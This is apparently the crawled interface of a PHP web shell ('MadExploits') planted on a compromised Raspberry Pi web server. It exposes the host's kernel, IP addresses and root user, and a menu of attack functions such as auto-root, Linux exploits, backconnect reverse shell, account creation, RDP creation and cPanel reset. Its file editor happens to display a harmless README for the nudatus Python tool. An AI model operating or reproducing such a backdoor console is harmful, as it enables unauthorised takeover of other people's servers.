Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python3-nudatus /
[ HOME SHELL ]
Name
Size
Permission
Action
CONTRIBUTING.rst
1.99
KB
-rw-r--r--
README.rst
1.06
KB
-rw-r--r--
changelog.Debian.gz
168
B
-rw-r--r--
changelog.gz
94
B
-rw-r--r--
copyright
1.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.rst
Nudatus ======= Nudatus is a tool to remove comments from Python scripts. It was created for use in uflash_ to help squeeze longer programs onto the micro:bit but it should be suitable for various environments with restricted storage. *Note* Nudatus uses the tokenizer built into Python so only supports the syntax of the version it's running on, but it's extremely unlikely this will cause you any issues (print is handled fine). Personally I pronounce nudatus as new-dat-us which I appreciate is probably 'wrong'. Usage -------- Nudatus is designed to be embedded within a greater tool (like uflash_ or Mu_ by ntoll_) but also provides a CLI tool: .. code:: text nudatus [-h] [--version] [input] [output] An input file must be specified but if output is omitted the result will be printed on stdout. Calling from a Python script is quite simple: .. code:: python import nudatus source = '' # Input script result = nudatus.mangle(source) # Result as str .. _uflash: https://github.com/ntoll/uflash .. _Mu: http://codewith.mu/ .. _ntoll: http://ntoll.org/
Close